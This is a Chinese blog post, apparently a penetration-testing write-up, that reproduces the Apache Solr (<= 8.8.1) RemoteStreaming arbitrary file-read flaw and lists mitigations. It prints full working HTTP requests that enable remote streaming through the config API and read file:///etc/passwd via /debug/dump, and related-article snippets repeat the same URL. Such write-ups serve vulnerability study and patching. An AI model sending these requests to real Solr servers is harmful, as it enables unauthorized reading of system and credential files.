Apache Solr 任意文件读取

最新推荐文章于 2024-05-12 14:14:04 发布
最新推荐文章于 2024-05-12 14:14:04 发布
阅读量5k 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 渗透测试 安全 apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43749601/article/details/124106916
版权

简介

Solr是Apache Lucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本(如Word、PDF)的处理。Solr是高度可扩展的,并提供了分布式搜索和索引复制。Solr是最流行的企业级搜索引擎,Solr 4还增加了NoSQL支持。
Solr是用Java编写、运行在Servlet容器(如Apache Tomcat或Jetty)的一个独立的全文搜索服务器。 Solr采用了Lucene Java搜索库为核心的全文索引和搜索,并具有类似REST的HTTP/XML和JSON的API。 Solr强大的外部配置功能使得无需进行Java编码,便可对其进行调整以适应多种类型的应用程序。Solr有一个插件架构,以支持更多的高级定制。

影响范围

Apache Solr <= 8.8.1

漏洞详情

1、访问solr后台
在这里插入图片描述

2、获取core中的name
http://example.com/solr/admin/cores?indexInfo=false&wt=json
在这里插入图片描述

3、判断漏洞是否存在
数据包:

POST /solr/new_core/config HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}

在这里插入图片描述
发送数据包,并根据返回信息判断漏洞是否存在。若返回状态码为200且含有: “WARNING”:“This response format is experimental. It is likely to change in the future.”,则可以判断漏洞可能存在

4、漏洞利用
利用漏洞读取文件
数据包:

POST /solr/new_core/debug/dump?param=ContentStreams HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

stream.url=file:///etc/passwd

在这里插入图片描述

http://example.com/solr/new_core/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd

在这里插入图片描述

修复方式

1、控制solr访问权限,增加访问口令
2、不对外网开放solr
3、关闭ConfigAPI:在bin目录下的solr.in.cmd中加入一行set SOLR_OPTS=%SOLR_OPTS% -Ddisable.configEdit=true;然后关闭远程读取文件流,默认不开启

2021!
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Solr RemoteStreaming 任意文件读取
Li-D的博客
06-07 354
漏洞描述 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache Solr是一个开源搜索服务引擎,攻击者可以在未授权的情况下构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 影响版本 Apache Solr <= 8.8.1 环境搭建 开启docker-compose环
Apache Solr RemoteStreaming 文件读取
weixin_51387754的博客
11-12 1056
漏洞简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果. Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取. 漏洞复现 环境使用kali+docker (root????guiltyfet)-[/ho
其他的 框架安全Apache Solr 远程代码漏洞.(CVE-2019-0193)
最新发布
网络安全领域___专研者.
05-12 567
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
【转】Apache Solr 访问权限控制
weixin_34405354的博客
12-30 162
  本文转自:http://www.cnblogs.com/ibook360/archive/2011/11/07/2239247.html 在Tomcat6增加 Solr的访问权限方法如下: 编辑tomcat6/Catalina/localhost/solr.xml &lt;Context docBase="/var/solr/solr.war" debug="0" privile...
Apache-Solr任意文件读取
DUANYU23的博客
04-12 1188
Apache-Solr任意文件读取0X001前言0X002 漏洞影响 0X001前言 Solr 是一个开源的企业级搜索服务器,底层使用易于扩展和修改的Java 来实现。服务器通信使用标准的HTTP 和XML Solr 主要特性有:强大的全文检索功能,高亮显示检索结果,动态集群,数据库接口和电子文档(Word ,PDF 等)的处理。而且Solr 具有高度的可扩展,支持分布搜索和索引的复制。 0X002 漏洞影响 Apache Solr <= 8.8.1(最新版,目前官方以RemoteStreaming默
solr配置文件解析
wdsafmy468619的专栏
06-15 3410
Solr安装 一、Solr的安装 1 在Windows上单机安装Solr 环境:Windows Server 2008、Java SDK、Tomcat 8、Solr 5.1.0 步骤: (1)安装Java; (2)安装Tomcat; (3)解压Solr 5.1.0.zip到Solr-5.1.0目录; (4)部署solr.war 在..\solr-5.1.0\server\weba
Apache-Solr-EXP:Apache Solr任意文件读取EXP
03-20
Apache-Solr-EXP Apache Solr任意文件读取EXP 环境要求:Python 3.8+
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
Apache Solr最新版任意文件读取0day1
08-03
0x01 正全版本任意读取 (官拒绝修复)默认安装未授权情况下,各项配置皆为默认下载 Solr 最新版本复现1. 第步2. 第步0x03 漏洞信息跟进0x04
Apache Solr组件安全概览1
08-03
近年来,Apache Solr曝出过多个高危漏洞,包括但不限于任意文件读取、远程代码执行等。这些漏洞可能被攻击者利用,影响系统的稳定性和数据安全性。文章末尾提到的一个全版本任意文件读取漏洞,官方拒绝修复,用户需...
[HACK学习呀] - 2019-11-02 Apache Solr最新RCE批量验证1
08-03
在2019年11月,Apache Solr被发现存在一个远程代码执行(RCE)漏洞,该漏洞允许攻击者通过精心构造的请求在受影响的Solr服务器上执行任意代码。这个漏洞主要影响Apache Solr的8.2.0版本及其之前版本。 漏洞的原理是...
SolrAnyFileRead:编码依据
03-19
Solr未授权任意文件重新分解 代码作者:Tas9er 警告 本工具初步帮助企业快速定位扩展修复扩展,完全授权安全测试使用严格遵守《中华人民共和国网络安全法》,禁止未授权非法攻击站点
Solr快速入门第四讲——Solr managed-schema配置文件详解
李阿昀的博客
04-22 3522
前言 本讲原意是想向大家介绍Solr中schema.xml配置文件的,但是在Solr 5.5以上版本中没有schema.xml这个配置文件了,而是出现了一个叫managed-schema的配置文件。所以,本讲将向大家介绍managed-schema这个配置文件,主要包括managed-schema配置文件中的使用实例、应用技巧、基本知识点总结以及需要注意的事项,还是具有一定的参考价值的,需要的朋友...
java实现solr全文检索_使用Solr进行服务日志全文检索(1.29)
weixin_36180471的博客
02-27 487
这个是我们年初就规划准备做的一个关键功能,即原来的服务日志检索更多的是根据服务运行日志,服务调用时间段进行日志检索,而不能根据业务报文里面的内容进行检索。由于我们在存储日志的时候,业务处理的消息报文是作为Blob类型结构化存储到数据库里面的,因此在传统模式下要实现报文的全文检索并不容易。而Solr是当前特别是互联网和电商使用的比较多的一个全文检索引擎,包括一些电商网站的商品模糊查询功能也在使用So...
Apache Solr最新任意文件读取漏洞
蚁景网安学院
04-01 929
漏洞简介 Apache Solr是一个开源搜索服务引擎,默认安装未授权情况下攻击者可以构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 本文涉及相关实验:CVE-2019-0192 Apache Solr远程反序列化代码执行漏洞(Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。) 影响版本 solr任意版本 环境搭建 漏洞环境下载: https://archive.apache.org/d
漏洞复现----20、Apache Solr RemoteStreaming 任意文件读取和SSRF
七天
10-12 578
文章目录一、Apache Solr简介二、内容流与RemoteStreaming1、内容流2、RemoteStreaming三、漏洞复现1、访问到Apache Solr的管理控制台 一、Apache Solr简介 Apache Solr是一个功能强大的开源搜索服务器,它支持REST风格API。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 影响版本:Apache Solr <= 8.8.1 1、下载地址: https://so
红方人员实战手册
qq_36584013的博客
06-19 1005
红方人员实战手册 声明 Author : By klion Date : 2020.2.15 寄语 : 愿 2020 后面的每一天都能一切安好 分享初衷 一来, 旨在为 "攻击" / "防御"方 提供更加全面实用的参考 还是那句老闲话 "未知攻焉知防", 所有单纯去说 "攻" 或者 "防" 的都是耍流氓, 攻守兼备才能把路越走越宽 二来, 也是为秉承共享协作, 希望...
Apache Solr任意文件读取漏洞复现
thelostworld
03-18 783
Apache Solr任意文件读取漏洞复现 一、简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache-Solr任意文件读取漏洞漏洞,攻击者可以在未授权的情况下读取目标服务器敏感文件和相关内容。 二、影响版本 Apache Solr <= 8.8.1 三、漏洞复现 安装: S..
Apache Solr 任意文件读取复现
时光凉春衫薄的博客
04-09 231
Apache Solr 然后访问这个目录就可以拿到当前db的名字 http://[ip]/solr/admin/cores?indexInfo=false&wt=json 然后把得到的名字在这个url中替换掉就可以任意读取文件 http://[IP]/solr/[name]/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值